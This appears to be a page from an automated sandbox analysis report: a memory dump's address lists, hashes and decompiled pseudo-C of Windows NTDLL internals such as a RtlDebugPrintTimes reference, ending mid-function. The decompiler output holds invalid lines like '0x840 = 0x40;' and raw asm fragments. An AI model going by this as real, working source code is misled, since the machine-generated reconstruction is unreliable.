0x0296d7d2
0x0296d7ca
0x029bb37c
0x029bb37e
0x029bb385
0x029bb38a
0x00000000
0x029bb38a
0x0296d742
0x0296d7f1
0x0296d7f8
0x029bb49b
0x029bb49b
0x0296d800
0x0296d837
0x0296d843
0x0296d845
0x0296d847
0x0296d84a
0x0296d84b
0x0296d84e
0x0296d857
0x0296d802
0x0296d802
0x0296d80d
0x00000000
0x0296d818
0x0296d818
0x0296d824
0x0296d831
0x029bb4a5
0x029bb4ab
0x029bb4b3
0x029bb4b8
0x029bb4bb
0x00000000
0x029bb4c1
0x029bb4c1
0x029bb4c8
0x00000000
0x029bb4ce
0x029bb4d4
0x029bb4e1
0x029bb4e3
0x029bb4e5
0x00000000
0x029bb4eb
0x029bb4f0
0x029bb4f2
0x0296dac9
0x0296dacc
0x0296dacf
0x0296dad1
0x0296dd78
0x0296dd78
0x0296dcf2
0x00000000
0x0296dad7
0x0296dad9
0x0296dadb
0x00000000
0x00000000
0x0296dae1
0x0296dae1
0x0296dae4
0x0296dae6
0x029bb4f9
0x029bb4f9
0x029bb500
0x0296daec
0x0296daec
0x0296daf5
0x0296daf8
0x0296dafb
0x0296db03
0x0296db11
0x0296db16
0x0296db19
0x0296db1b
0x029bb52c
0x029bb531
0x029bb534
0x0296db21
0x0296db21
0x0296db24
0x0296dcd9
0x0296dce2
0x0296dce5
0x0296dd6a
0x0296dd6d
0x00000000
0x0296dd73
0x029bb51a
0x029bb51c
0x029bb51f
0x029bb524
0x00000000
0x029bb524
0x0296dce7
0x0296dce7
0x0296dce7
0x00000000
0x0296dce7
0x00000000
0x0296db2a
0x0296db2c
0x0296db31
0x0296db33
0x0296db36
0x0296db39
0x0296db3b
0x0296db66
0x0296db66
0x0296db3d
0x0296db3d
0x0296db3e
0x0296db46
0x0296db47
0x0296db49
0x0296db4c
0x0296db53
0x0296db55
0x0296db58
0x0296db5a
0x029bb50a
0x029bb50f
0x029bb512
0x0296db60
0x0296db60
0x0296db63
0x0296db63
0x00000000
0x0296db63
0x0296db5a
0x0296db3b
0x0296db24
0x0296db69
0x0296db69
0x0296db6c
0x0296db6f
0x0296db74
0x029bb557
0x029bb557
0x029bb55e
0x0296db7a
0x0296db7c
0x0296db7f
0x0296db82
0x0296db85
0x00000000
0x0296db8b
0x0296db8b
0x0296db8d
0x0296db9b
0x0296db9b
0x0296db9d
0x0296dba0
0x0296dba2
0x0296dba4
0x0296dba7
0x0296dba9
0x0296dbae
0x0296dbae
0x0296dbb1
0x0296dbb4
0x0296dbb4
0x0296dbb7
0x0296dbba
0x0296dcd2
0x0296dcd4
0x00000000
0x0296dbc0
0x0296dbc0
0x0296dbd2
0x0296dbd7
0x0296dbda
0x0296dbdd
0x0296dbdf
0x00000000
0x0296dbe5
0x0296dbe5
0x0296dbee
0x0296dbf1
0x029bb541
0x029bb544
0x00000000
0x029bb546
0x029bb546
0x00000000
0x029bb546
0x0296dbf7
0x0296dbf7
0x0296dbfd
0x0296dbfd
0x0296dbff
0x0296dc0b
0x0296dc15
0x0296dc1b
0x0296dc1d
0x0296dc21
0x0296dc21
0x0296dc23
0x0296dc23
0x0296dc26
0x0296dc29
0x0296dc2b
0x00000000
0x00000000
0x0296dc31
0x0296dc34
0x0296dc36
0x0296dcbf
0x0296dcbf
0x0296dcc2
0x00000000
0x0296dc3c
0x0296dc41
0x0296dc43
0x00000000
0x0296dc45
0x0296dc45
0x0296dc47
0x00000000
0x0296dc4d
0x0296dc4d
0x0296dc50
0x0296dc52
0x0296dc55
0x0296dcfa
0x0296dcfe
0x0296dd08
0x0296dd0a
0x0296dd0c
0x00000000
0x0296dd12
0x0296dd15
0x0296dd2d
0x0296dd2f
0x0296dd32
0x0296dd35
0x00000000
0x0296dd35
0x0296dc5b
0x0296dc5b
0x0296dc5e
0x0296dc61
0x0296dc64
0x0296dc67
0x0296dc67
0x0296dc6a
0x0296dc6c
0x0296dc8e
0x0296dc8e
0x0296dc91
0x0296dc93
0x0296dcce
0x0296dcce
0x0296dc95
0x0296dc9c
0x0296dc6e
0x0296dc72
0x0296dc75
0x0296dc77
0x0296dc79
0x029bb551
0x029bb551
0x00000000
0x0296dc7f
0x0296dc7f
0x0296dc81
0x00000000
0x0296dc83
0x0296dc86
0x0296dc88
0x00000000
0x00000000
0x00000000
0x00000000
0x0296dc88
0x0296dc81
0x0296dc79
0x0296dc6c
0x0296dc55
0x0296dc47
0x0296dc43
0x00000000
0x0296dc36
0x0296dc23
0x00000000
0x0296dbff
0x0296dbf1
0x0296dbdf
0x0296db8f
0x0296db92
0x0296db95
0x00000000
0x00000000
0x00000000
0x00000000
0x0296db95
0x0296db8d
0x0296db85
0x0296db74
0x0296dc9f
0x0296dca2
0x0296dcb0
0x0296dcb0
0x0296dad1
0x029bb4e5
0x029bb4c8
0x00000000
0x00000000
0x00000000
0x0296d831
0x0296d80d
0x00000000
0x0296d800
0x029bb47f
0x029bb485
0x00000000
0x029bb485
0x0296d665
0x0296d652
0x00000000

APIs

RtlDebugPrintTimes.NTDLL ref: 0296D898

Memory Dump Source

Source File: 00000002.00000002.358703617.0000000002930000.00000040.00000001.sdmp, Offset: 02930000, based on PE: true

Associated: 00000002.00000002.358798882.0000000002A4B000.00000040.00000001.sdmp Download File
Associated: 00000002.00000002.358805587.0000000002A4F000.00000040.00000001.sdmp Download File

Similarity

API ID: DebugPrintTimes
String ID:
API String ID: 3446177414-0
Opcode ID: 92216023ab5c97c318ed0d90ad6183da6d75739bc0a2b4bf05d61f1c81315c95
Instruction ID: 6fd4b03a12a7830c181fbbb3193d547297bf804e827ae6d68f8d017526c92c70
Opcode Fuzzy Hash: 92216023ab5c97c318ed0d90ad6183da6d75739bc0a2b4bf05d61f1c81315c95
Instruction Fuzzy Hash: F5E1D074B013598FEB25CF14C998BB9B7F6BF85308F0405A9D91997290DB34E981CF62

Uniqueness

Uniqueness Score: -1.00%

Function 0298513A, Relevance: 1.8, APIs: 1, Instructions: 258
timeCOMMON

Download Yara Rule

C-Code - Quality: 67%

			E0298513A(intOrPtr __ecx, void* __edx) {
				signed int _v8;
				signed char _v16;
				intOrPtr _v20;
				intOrPtr _v24;
				char _v28;
				signed int _v32;
				signed int _v36;
				signed int _v40;
				intOrPtr _v44;
				intOrPtr _v48;
				char _v63;
				char _v64;
				signed int _v72;
				signed int _v76;
				signed int _v80;
				signed int _v84;
				signed int _v88;
				signed char* _v92;
				signed int _v100;
				signed int _v104;
				char _v105;
				void* __ebx;
				void* __edi;
				void* __esi;
				void* _t157;
				signed int _t159;
				signed int _t160;
				unsigned int* _t161;
				intOrPtr _t165;
				signed int _t172;
				signed char* _t181;
				intOrPtr _t189;
				intOrPtr* _t200;
				signed int _t202;
				signed int _t203;
				char _t204;
				signed int _t207;
				signed int _t208;
				void* _t209;
				intOrPtr _t210;
				signed int _t212;
				signed int _t214;
				signed int _t221;
				signed int _t222;
				signed int _t226;
				intOrPtr* _t232;
				signed int _t233;
				signed int _t234;
				intOrPtr _t237;
				intOrPtr _t238;
				intOrPtr _t240;
				void* _t245;
				signed int _t246;
				signed int _t247;
				void* _t248;
				void* _t251;
				void* _t252;
				signed int _t253;
				signed int _t255;
				signed int _t256;

				_t255 = (_t253 & 0xfffffff8) - 0x6c;
				_v8 =  *0x2a4d360 ^ _t255;
				_v32 = _v32 & 0x00000000;
				_t251 = __edx;
				_t237 = __ecx;
				_t212 = 6;
				_t245 =  &_v84;
				_t207 =  *((intOrPtr*)(__ecx + 0x48));
				_v44 =  *((intOrPtr*)(__edx + 0xc8));
				_v48 = __ecx;
				_v36 = _t207;
				_t157 = memset(_t245, 0, _t212 << 2);
				_t256 = _t255 + 0xc;
				_t246 = _t245 + _t212;
				if(_t207 == 2) {
					_t247 =  *(_t237 + 0x60);
					_t208 =  *(_t237 + 0x64);
					_v63 =  *((intOrPtr*)(_t237 + 0x4c));
					_t159 =  *((intOrPtr*)(_t237 + 0x58));
					_v104 = _t159;
					_v76 = _t159;
					_t160 =  *((intOrPtr*)(_t237 + 0x5c));
					_v100 = _t160;
					_v72 = _t160;
					L19:
					_v80 = _t208;
					_v84 = _t247;
					L8:
					_t214 = 0;
					if( *(_t237 + 0x74) > 0) {
						_t82 = _t237 + 0x84; // 0x124
						_t161 = _t82;
						_v92 = _t161;
						while( *_t161 >> 0x1f != 0) {
							_t200 = _v92;
							if( *_t200 == 0x80000000) {
								break;
							}
							_t214 = _t214 + 1;
							_t161 = _t200 + 0x10;
							_v92 = _t161;
							if(_t214 <  *(_t237 + 0x74)) {
								continue;
							}
							goto L9;
						}
						_v88 = _t214 << 4;
						_v40 = _t237 +  *((intOrPtr*)(_v88 + _t237 + 0x78));
						_t165 = 0;
						asm("adc eax, [ecx+edx+0x7c]");
						_v24 = _t165;
						_v28 = _v40;
						_v20 =  *((intOrPtr*)(_v88 + _t237 + 0x80));
						_t221 = _v40;
						_v16 =  *_v92;
						_v32 =  &_v28;
						if( *(_t237 + 0x4e) >> 0xf == 0) {
							goto L9;
						}
						_t240 = _v48;
						if( *_v92 != 0x80000000) {
							goto L9;
						}
						 *((intOrPtr*)(_t221 + 8)) = 0;
						 *((intOrPtr*)(_t221 + 0xc)) = 0;
						 *((intOrPtr*)(_t221 + 0x14)) = 0;
						 *((intOrPtr*)(_t221 + 0x10)) = _v20;
						_t226 = 0;
						_t181 = _t251 + 0x66;
						_v88 = 0;
						_v92 = _t181;
						do {
							if( *((char*)(_t181 - 2)) == 0) {
								goto L31;
							}
							_t226 = _v88;
							if(( *_t181 & 0x000000ff) == ( *(_t240 + 0x4e) & 0x7fff)) {
								_t181 = E0299D0F0(1, _t226 + 0x20, 0);
								_t226 = _v40;
								 *(_t226 + 8) = _t181;
								 *((intOrPtr*)(_t226 + 0xc)) = 0;
								L34:
								if(_v44 == 0) {
									goto L9;
								}
								_t210 = _v44;
								_t127 = _t210 + 0x1c; // 0x1c
								_t249 = _t127;
								E02972280(_t181, _t127);
								 *(_t210 + 0x20) =  *( *[fs:0x18] + 0x24);
								_t185 =  *((intOrPtr*)(_t210 + 0x94));
								if( *((intOrPtr*)(_t210 + 0x94)) != 0) {
									L029777F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t185);
								}
								_t189 = L02974620(_t226,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 8, _v20 + 0x10);
								 *((intOrPtr*)(_t210 + 0x94)) = _t189;
								if(_t189 != 0) {
									 *((intOrPtr*)(_t189 + 8)) = _v20;
									 *( *((intOrPtr*)(_t210 + 0x94)) + 0xc) = _v16;
									_t232 =  *((intOrPtr*)(_t210 + 0x94));
									 *_t232 = _t232 + 0x10;
									 *(_t232 + 4) =  *(_t232 + 4) & 0x00000000;
									E0299F3E0( *((intOrPtr*)( *((intOrPtr*)(_t210 + 0x94)))), _v28, _v20);
									_t256 = _t256 + 0xc;
								}
								 *(_t210 + 0x20) =  *(_t210 + 0x20) & 0x00000000;
								E0296FFB0(_t210, _t249, _t249);
								_t222 = _v76;
								_t172 = _v80;
								_t208 = _v84;
								_t247 = _v88;
								L10:
								_t238 =  *((intOrPtr*)(_t251 + 0x1c));
								_v44 = _t238;
								if(_t238 != 0) {
									 *0x2a4b1e0(_v48 + 0x38, _v36, _v63, _t172, _t222, _t247, _t208, _v32,  *((intOrPtr*)(_t251 + 0x20)));
									_v44();
								}
								_pop(_t248);
								_pop(_t252);
								_pop(_t209);
								return E0299B640(0, _t209, _v8 ^ _t256, _t238, _t248, _t252);
							}
							_t181 = _v92;
							L31:
							_t226 = _t226 + 1;
							_t181 =  &(_t181[0x18]);
							_v88 = _t226;
							_v92 = _t181;
						} while (_t226 < 4);
						goto L34;
					}
					L9:
					_t172 = _v104;
					_t222 = _v100;
					goto L10;
				}
				_t247 = _t246 | 0xffffffff;
				_t208 = _t247;
				_v84 = _t247;
				_v80 = _t208;
				if( *((intOrPtr*)(_t251 + 0x4c)) == _t157) {
					_t233 = _v72;
					_v105 = _v64;
					_t202 = _v76;
				} else {
					_t204 =  *((intOrPtr*)(_t251 + 0x4d));
					_v105 = 1;
					if(_v63 <= _t204) {
						_v63 = _t204;
					}
					_t202 = _v76 |  *(_t251 + 0x40);
					_t233 = _v72 |  *(_t251 + 0x44);
					_t247 =  *(_t251 + 0x38);
					_t208 =  *(_t251 + 0x3c);
					_v76 = _t202;
					_v72 = _t233;
					_v84 = _t247;
					_v80 = _t208;
				}
				_v104 = _t202;
				_v100 = _t233;
				if( *((char*)(_t251 + 0xc4)) != 0) {
					_t237 = _v48;
					_v105 = 1;
					if(_v63 <=  *((intOrPtr*)(_t251 + 0xc5))) {
						_v63 =  *((intOrPtr*)(_t251 + 0xc5));
						_t237 = _v48;
					}
					_t203 = _t202 |  *(_t251 + 0xb8);
					_t234 = _t233 |  *(_t251 + 0xbc);
					_t247 = _t247 &  *(_t251 + 0xb0);
					_t208 = _t208 &  *(_t251 + 0xb4);
					_v104 = _t203;
					_v76 = _t203;
					_v100 = _t234;
					_v72 = _t234;
					_v84 = _t247;
					_v80 = _t208;
				}
				if(_v105 == 0) {
					_v36 = _v36 & 0x00000000;
					_t208 = 0;
					_t247 = 0;
					 *(_t237 + 0x74) =  *(_t237 + 0x74) & 0;
					goto L19;
				} else {
					_v36 = 1;
					goto L8;
				}
			}

0x02985142
0x0298514c
0x02985150
0x02985157
0x02985159
0x0298515e
0x02985165
0x02985169
0x0298516c
0x02985172
0x02985176
0x0298517a
0x0298517a
0x0298517a
0x0298517f
0x029c6d8b
0x029c6d8e
0x029c6d91
0x029c6d95
0x029c6d98
0x029c6d9c
0x029c6da0
0x029c6da3
0x029c6da7
0x029c6e26
0x029c6e26
0x029c6e2a
0x029851f9
0x029851f9
0x029851fe
0x029c6e33
0x029c6e33
0x029c6e39
0x029c6e3d
0x029c6e46
0x029c6e50
0x00000000
0x00000000
0x029c6e52
0x029c6e53
0x029c6e56
0x029c6e5d
0x00000000
0x00000000
0x00000000
0x029c6e5f
0x029c6e67
0x029c6e77
0x029c6e7f
0x029c6e80
0x029c6e88
0x029c6e90
0x029c6e9f
0x029c6ea5
0x029c6ea9
0x029c6eb1
0x029c6ebf
0x00000000
0x00000000
0x029c6ecf
0x029c6ed3
0x00000000
0x00000000
0x029c6edb
0x029c6ede
0x029c6ee1
0x029c6ee8
0x029c6eeb
0x029c6eed
0x029c6ef0
0x029c6ef4
0x029c6ef8
0x029c6efc
0x00000000
0x00000000
0x029c6f0d
0x029c6f11
0x029c6f32
0x029c6f37
0x029c6f3b
0x029c6f3e
0x029c6f41
0x029c6f46
0x00000000
0x00000000
0x029c6f4c
0x029c6f50
0x029c6f50
0x029c6f54
0x029c6f62
0x029c6f65
0x029c6f6d
0x029c6f7b
0x029c6f7b
0x029c6f93
0x029c6f98
0x029c6fa0
0x029c6fa6
0x029c6fb3
0x029c6fb6
0x029c6fbf
0x029c6fc1
0x029c6fd5
0x029c6fda
0x029c6fda
0x029c6fdd
0x029c6fe2
0x029c6fe7
0x029c6feb
0x029c6fef
0x029c6ff3
0x0298520c
0x0298520c
0x0298520f
0x02985215
0x02985234
0x0298523a
0x0298523a
0x02985244
0x02985245
0x02985246
0x02985251
0x02985251
0x029c6f13
0x029c6f17
0x029c6f17
0x029c6f18
0x029c6f1b
0x029c6f1f
0x029c6f23
0x00000000
0x029c6f28
0x02985204
0x02985204
0x02985208
0x00000000
0x02985208
0x02985185
0x02985188
0x0298518a
0x0298518e
0x02985195
0x029c6db1
0x029c6db5
0x029c6db9
0x0298519b
0x0298519b
0x0298519e
0x029851a7
0x029851a9
0x029851a9
0x029851b5
0x029851b8
0x029851bb
0x029851be
0x029851c1
0x029851c5
0x029851c9
0x029851cd
0x029851cd
0x029851d8
0x029851dc
0x029851e0
0x029c6dcc
0x029c6dd0
0x029c6dd5
0x029c6ddd
0x029c6de1
0x029c6de1
0x029c6de5
0x029c6deb
0x029c6df1
0x029c6df7
0x029c6dfd
0x029c6e01
0x029c6e05
0x029c6e09
0x029c6e0d
0x029c6e11
0x029c6e11
0x029851eb
0x029c6e1a
0x029c6e1f
0x029c6e21
0x029c6e23
0x00000000
0x029851f1
0x029851f1
0x00000000
0x029851f1

APIs

RtlDebugPrintTimes.NTDLL ref: 02985234

Memory Dump Source

Source File: 00000002.00000002.358703617.0000000002930000.00000040.00000001.sdmp, Offset: 02930000, based on PE: true

Associated: 00000002.00000002.358798882.0000000002A4B000.00000040.00000001.sdmp Download File
Associated: 00000002.00000002.358805587.0000000002A4F000.00000040.00000001.sdmp Download File

Similarity

API ID: DebugPrintTimes
String ID:
API String ID: 3446177414-0
Opcode ID: bbad1cc6a8e421a069392fd009447567640770ec4d0d5c27aaaf24198927b248
Instruction ID: 1d7f6ff9205d7081efc67c6d5340ec2e7cc6366288466ad4e355336c96e018f4
Opcode Fuzzy Hash: bbad1cc6a8e421a069392fd009447567640770ec4d0d5c27aaaf24198927b248
Instruction Fuzzy Hash: 0DC102B55083818FD354CF28C580A6AFBF5BF88308F184A6EF8998B352D775E945CB52

Uniqueness

Uniqueness Score: -1.00%

Function 029803E2, Relevance: 1.8, APIs: 1, Instructions: 254
COMMON

Download Yara Rule

C-Code - Quality: 74%

			E029803E2(signed int __ecx, signed int __edx) {
				signed int _v8;
				signed int _v12;
				signed int _v16;
				signed int _v20;
				signed int _v24;
				signed int _v28;
				signed int _v32;
				signed int _v36;
				intOrPtr _v40;
				signed int _v44;
				signed int _v48;
				char _v52;
				char _v56;
				char _v64;
				void* __ebx;
				void* __edi;
				void* __esi;
				signed int _t56;
				signed int _t58;
				char* _t64;
				intOrPtr _t65;
				signed int _t74;
				signed int _t79;
				char* _t83;
				intOrPtr _t84;
				signed int _t93;
				signed int _t94;
				signed char* _t95;
				signed int _t99;
				signed int _t100;
				signed char* _t101;
				signed int _t105;
				signed int _t119;
				signed int _t120;
				void* _t122;
				signed int _t123;
				signed int _t127;

				_v8 =  *0x2a4d360 ^ _t127;
				_t119 = __ecx;
				_t105 = __edx;
				_t118 = 0;
				_v20 = __edx;
				_t120 =  *(__ecx + 0x20);
				if(E02980548(__ecx, 0) != 0) {
					_t56 = 0xc000022d;
					L23:
					return E0299B640(_t56, _t105, _v8 ^ _t127, _t118, _t119, _t120);
				} else {
					_v12 = _v12 | 0xffffffff;
					_t58 = _t120 + 0x24;
					_t109 =  *(_t120 + 0x18);
					_t118 = _t58;
					_v16 = _t58;
					E0296B02A( *(_t120 + 0x18), _t118, 0x14a5);
					_v52 = 0x18;
					_v48 = 0;
					0x840 = 0x40;
					if( *0x2a47c1c != 0) {
					}
					_v40 = 0x840;
					_v44 = _t105;
					_v36 = 0;
					_v32 = 0;
					if(E02977D50() != 0) {
						_t64 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22a;
					} else {
						_t64 = 0x7ffe0384;
					}
					if( *_t64 != 0) {
						_t65 =  *[fs:0x30];
						__eflags =  *(_t65 + 0x240) & 0x00000004;
						if(( *(_t65 + 0x240) & 0x00000004) != 0) {
							_t100 = E02977D50();
							__eflags = _t100;
							if(_t100 == 0) {
								_t101 = 0x7ffe0385;
							} else {
								_t101 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22b;
							}
							__eflags =  *_t101 & 0x00000020;
							if(( *_t101 & 0x00000020) != 0) {
								_t118 = _t118 | 0xffffffff;
								_t109 = 0x1485;
								E029D7016(0x1485, _t118, 0xffffffff, 0xffffffff, 0, 0);
							}
						}
					}
					_t105 = 0;
					while(1) {
						_push(0x60);
						_push(5);
						_push( &_v64);
						_push( &_v52);
						_push(0x100021);
						_push( &_v12);
						_t122 = E02999830();
						if(_t122 >= 0) {
							break;
						}
						__eflags = _t122 - 0xc0000034;
						if(_t122 == 0xc0000034) {
							L38:
							_t120 = 0xc0000135;
							break;
						}
						__eflags = _t122 - 0xc000003a;
						if(_t122 == 0xc000003a) {
							goto L38;
						}
						__eflags = _t122 - 0xc0000022;
						if(_t122 != 0xc0000022) {
							break;
						}
						__eflags = _t105;
						if(__eflags != 0) {
							break;
						}
						_t109 = _t119;
						_t99 = E029D69A6(_t119, __eflags);
						__eflags = _t99;
						if(_t99 == 0) {
							break;
						}
						_t105 = _t105 + 1;
					}
					if( !_t120 >= 0) {
						L22:
						_t56 = _t120;
						goto L23;
					}
					if( *0x2a47c04 != 0) {
						_t118 = _v12;
						_t120 = E029DA7AC(_t119, _t118, _t109);
						__eflags = _t120;
						if(_t120 >= 0) {
							goto L10;
						}
						__eflags =  *0x2a47bd8;
						if( *0x2a47bd8 != 0) {
							L20:
							if(_v12 != 0xffffffff) {
								_push(_v12);
								E029995D0();
							}
							goto L22;
						}
					}
					L10:
					_push(_v12);
					_t105 = _t119 + 0xc;
					_push(0x1000000);
					_push(0x10);
					_push(0);
					_push(0);
					_push(0xf);
					_push(_t105);
					_t120 = E029999A0();
					if(_t120 < 0) {
						__eflags = _t120 - 0xc000047e;
						if(_t120 == 0xc000047e) {
							L51:
							_t74 = E029D3540(_t120);
							_t119 = _v16;
							_t120 = _t74;
							L52:
							_t118 = 0x1485;
							E0295B1E1(_t120, 0x1485, 0, _t119);
							goto L20;
						}
						__eflags = _t120 - 0xc000047f;
						if(_t120 == 0xc000047f) {
							goto L51;
						}
						__eflags = _t120 - 0xc0000462;
						if(_t120 == 0xc0000462) {
							goto L51;
						}
						_t119 = _v16;
						__eflags = _t120 - 0xc0000017;
						if(_t120 != 0xc0000017) {
							__eflags = _t120 - 0xc000009a;
							if(_t120 != 0xc000009a) {
								__eflags = _t120 - 0xc000012d;
								if(_t120 != 0xc000012d) {
									_v28 = _t119;
									_push( &_v56);
									_push(1);
									_v24 = _t120;
									_push( &_v28);
									_push(1);
									_push(2);
									_push(0xc000007b);
									_t79 = E0299AAF0();
									__eflags = _t79;
									if(_t79 >= 0) {
										__eflags =  *0x2a48474 - 3;
										if( *0x2a48474 != 3) {
											 *0x2a479dc =  *0x2a479dc + 1;
										}
									}
								}
							}
						}
						goto L52;
					}
					if(E02977D50() != 0) {
						_t83 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22a;
					} else {
						_t83 = 0x7ffe0384;
					}
					if( *_t83 != 0) {
						_t84 =  *[fs:0x30];
						__eflags =  *(_t84 + 0x240) & 0x00000004;
						if(( *(_t84 + 0x240) & 0x00000004) != 0) {
							_t94 = E02977D50();
							__eflags = _t94;
							if(_t94 == 0) {
								_t95 = 0x7ffe0385;
							} else {
								_t95 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22b;
							}
							__eflags =  *_t95 & 0x00000020;
							if(( *_t95 & 0x00000020) != 0) {
								E029D7016(0x1486, _t118, 0xffffffff, 0xffffffff, 0, 0);
							}
						}
					}
					if(( *(_t119 + 0x10) & 0x00000100) == 0) {
						if( *0x2a48708 != 0) {
							_t118 =  *0x7ffe0330;
							_t123 =  *0x2a47b00; // 0x0
							asm("ror esi, cl");
							 *0x2a4b1e0(_v12, _v20, 0x20);
							_t93 =  *(_t123 ^  *0x7ffe0330)();
							_t50 = _t93 + 0x3ffffddb; // 0x3ffffddb
							asm("sbb esi, esi");
							_t120 =  ~_t50 & _t93;
						} else {
							_t120 = 0;
						}
					}
					if( !_t120 >= 0) {
						L19:
						_push( *_t105);
						E029995D0();
						 *_t105 =  *_t105 & 0x00000000;
						goto L20;
					}
					_t120 = E02967F65(_t119);
					if( *((intOrPtr*)(_t119 + 0x60)) != 0) {
						__eflags = _t120;
						if(_t120 < 0) {
							goto L19;
						}
						 *(_t119 + 0x64) = _v12;
						goto L22;
					}
					goto L19;
				}
			}

0x029803f1
0x029803f7
0x029803f9
0x029803fb
0x029803fd
0x02980400
0x0298040a
0x029c4c7a
0x02980537
0x02980547
0x02980410
0x02980410
0x02980414
0x02980417
0x0298041a
0x02980421
0x02980424
0x0298042b
0x0298043b
0x0298043e
0x0298043f
0x0298043f
0x02980446
0x02980449
0x0298044c
0x0298044f
0x02980459
0x029c4c8d
0x0298045f
0x0298045f
0x0298045f
0x02980467
0x029c4c97
0x029c4c9d
0x029c4ca4
0x029c4caa
0x029c4caf
0x029c4cb1
0x029c4cc3
0x029c4cb3
0x029c4cbc
0x029c4cbc
0x029c4cc8
0x029c4ccb
0x029c4cd7
0x029c4cda
0x029c4cdf
0x029c4cdf
0x029c4ccb
0x029c4ca4
0x0298046d
0x0298046f
0x0298046f
0x02980471
0x02980476
0x0298047a
0x0298047b
0x02980483
0x02980489
0x0298048d
0x00000000
0x00000000
0x029c4ce9
0x029c4cef
0x029c4d22
0x029c4d22
0x00000000
0x029c4d22
0x029c4cf1
0x029c4cf7
0x00000000
0x00000000
0x029c4cf9
0x029c4cff
0x00000000
0x00000000
0x029c4d05
0x029c4d07
0x00000000
0x00000000
0x029c4d0d
0x029c4d0f
0x029c4d14
0x029c4d16
0x00000000
0x00000000
0x029c4d1c
0x029c4d1c
0x02980499
0x02980535
0x02980535
0x00000000
0x02980535
0x029804a6
0x029c4d2c
0x029c4d37
0x029c4d39
0x029c4d3b
0x00000000
0x00000000
0x029c4d41
0x029c4d48
0x02980527
0x0298052b
0x0298052d
0x02980530
0x02980530
0x00000000
0x0298052b
0x029c4d4e
0x029804ac
0x029804ac
0x029804af
0x029804b2
0x029804b7
0x029804b9
0x029804bb
0x029804bd
0x029804bf
0x029804c5
0x029804c9
0x029c4d53
0x029c4d59
0x029c4db9
0x029c4dba
0x029c4dbf
0x029c4dc2
0x029c4dc4
0x029c4dc7
0x029c4dce
0x00000000
0x029c4dce
0x029c4d5b
0x029c4d61
0x00000000
0x00000000
0x029c4d63
0x029c4d69
0x00000000
0x00000000
0x029c4d6b
0x029c4d6e
0x029c4d74
0x029c4d76
0x029c4d7c
0x029c4d7e
0x029c4d84
0x029c4d89
0x029c4d8c
0x029c4d8d
0x029c4d92
0x029c4d95
0x029c4d96
0x029c4d98
0x029c4d9a
0x029c4d9f
0x029c4da4
0x029c4da6
0x029c4da8
0x029c4daf
0x029c4db1
0x029c4db1
0x029c4daf
0x029c4da6
0x029c4d84
0x029c4d7c
0x00000000
0x029c4d74
0x029804d6
0x029c4de1
0x029804dc
0x029804dc
0x029804dc
0x029804e4
0x029c4deb
0x029c4df1
0x029c4df8
0x029c4dfe
0x029c4e03
0x029c4e05
0x029c4e17
0x029c4e07
0x029c4e10
0x029c4e10
0x029c4e1c
0x029c4e1f
0x029c4e35
0x029c4e35
0x029c4e1f
0x029c4df8
0x029804f1
0x029804fa
0x029c4e3f
0x029c4e47
0x029c4e5b
0x029c4e61
0x029c4e67
0x029c4e69
0x029c4e71
0x029c4e73
0x02980500
0x02980500
0x02980500
0x029804fa
0x02980508
0x0298051d
0x0298051d
0x0298051f
0x02980524
0x00000000
0x02980524
0x02980515
0x02980517
0x029c4e7a
0x029c4e7c
0x00000000
0x00000000
0x029c4e85
0x00000000
0x029c4e85
0x00000000
0x02980517

Memory Dump Source

Source File: 00000002.00000002.358703617.0000000002930000.00000040.00000001.sdmp, Offset: 02930000, based on PE: true

Associated: 00000002.00000002.358798882.0000000002A4B000.00000040.00000001.sdmp Download File
Associated: 00000002.00000002.358805587.0000000002A4F000.00000040.00000001.sdmp Download File

Similarity

API ID:
String ID:
API String ID:
Opcode ID: aa2d4c1c1e180a2bfc6d7b70e24e717e2756ec8c518ae109393bd58a2667194c
Instruction ID: 82b9f14ea995a0d244d6b0ef09faaddef4dd20eaa4c9fe1620405ff47cea8579
Opcode Fuzzy Hash: aa2d4c1c1e180a2bfc6d7b70e24e717e2756ec8c518ae109393bd58a2667194c
Instruction Fuzzy Hash: 52914B31F402549FEB31AB78C854BAD7BE9EF41728F190269E911AB2D0E774DD04CB92

Uniqueness

Uniqueness Score: -1.00%

Function 0297B944, Relevance: 1.7, APIs: 1, Instructions: 166
COMMON

Download Yara Rule

C-Code - Quality: 76%

			E0297B944(signed int* __ecx, char __edx) {
				signed int _v8;
				signed int _v16;
				signed int _v20;
				char _v28;
				signed int _v32;
				char _v36;
				signed int _v40;
				intOrPtr _v44;
				signed int* _v48;
				signed int _v52;
				signed int _v56;
				intOrPtr _v60;
				intOrPtr _v64;
				intOrPtr _v68;
				intOrPtr _v72;
				intOrPtr _v76;
				char _v77;
				void* __ebx;
				void* __edi;
				void* __esi;
				intOrPtr* _t65;
				intOrPtr _t67;
				intOrPtr _t68;
				char* _t73;
				intOrPtr _t77;
				intOrPtr _t78;
				signed int _t82;
				intOrPtr _t83;
				void* _t87;
				char _t88;
				intOrPtr* _t89;
				intOrPtr _t91;
				void* _t97;
				intOrPtr _t100;
				void* _t102;
				void* _t107;
				signed int _t108;
				intOrPtr* _t112;
				void* _t113;
				intOrPtr* _t114;
				intOrPtr _t115;
				intOrPtr _t116;
				intOrPtr _t117;
				signed int _t118;
				void* _t130;

				_t120 = (_t118 & 0xfffffff8) - 0x4c;
				_v8 =  *0x2a4d360 ^ (_t118 & 0xfffffff8) - 0x0000004c;
				_t112 = __ecx;
				_v77 = __edx;
				_v48 = __ecx;
				_v28 = 0;
				_t5 = _t112 + 0xc; // 0x575651ff
				_t105 =  *_t5;
				_v20 = 0;
				_v16 = 0;
				if(_t105 == 0) {
					_t50 = _t112 + 4; // 0x5de58b5b
					_t60 =  *__ecx |  *_t50;
					if(( *__ecx |  *_t50) != 0) {
						 *__ecx = 0;
						__ecx[1] = 0;
						if(E02977D50() != 0) {
							_t65 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22c;
						} else {
							_t65 = 0x7ffe0386;
						}
						if( *_t65 != 0) {
							E02A28CD6(_t112);
						}
						_push(0);
						_t52 = _t112 + 0x10; // 0x778df98b
						_push( *_t52);
						_t60 = E02999E20();
					}
					L20:
					_pop(_t107);
					_pop(_t113);
					_pop(_t87);
